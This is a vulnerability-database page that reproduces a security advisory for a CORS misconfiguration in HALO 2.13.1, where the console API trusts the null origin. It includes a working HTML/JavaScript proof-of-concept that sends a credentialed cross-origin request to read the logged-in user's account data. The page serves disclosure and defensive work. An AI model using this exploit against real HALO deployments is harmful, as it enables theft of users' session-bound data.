Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HALO 2.13.1 CORS Issue

🗓️ 15 Mar 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 279 Views

HALO-2.13.1 CORS policy allows arbitrary origin trust, leading to high vulnerabilit

Code
`## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted  
## Author: nu11secur1ty  
## Date: 03/15/2024  
## Vendor: https://www.halo.run/  
## Software: https://github.com/halo-dev/halo  
## Reference: https://portswigger.net/web-security/cors  
  
## Description:  
The application implements an HTML5 cross-origin resource sharing  
(CORS) policy for this request that allows access from any domain.  
The application allowed access from the requested origin null  
The application allows two-way interaction from the null origin. This  
effectively means that any domain can perform two-way interaction by  
causing the browser to submit the null origin, for example by issuing  
the request from a sandboxed iframe or malicious fishing domain with a  
specially crafted HTML exploit.  
  
STATUS: HIGH- Vulnerability  
  
[+]Exploit:  
```HTML  
<html>  
<body>  
<center>  
<h2>CORS POC Exploit  
<h3>Extract SID  
  
<div id="demo">  
<button type="button" onclick="cors()">Exploit Click here  
</div>  
  
<script>  
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {  
if (this.readyState == 4 && this.status == 200) {  
document.getElementById("demo").innerHTML = alert(this.responseText);  
}  
};  
xhttp.open("GET",  
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",  
true);  
xhttp.withCredentials = true;  
xhttp.send();  
}  
</script>  
  
</body>  
</html>  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)  
  
## Time spent:  
00:25:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
cors policy implementationarbitrary origin trusthtml exploitexploit impact
279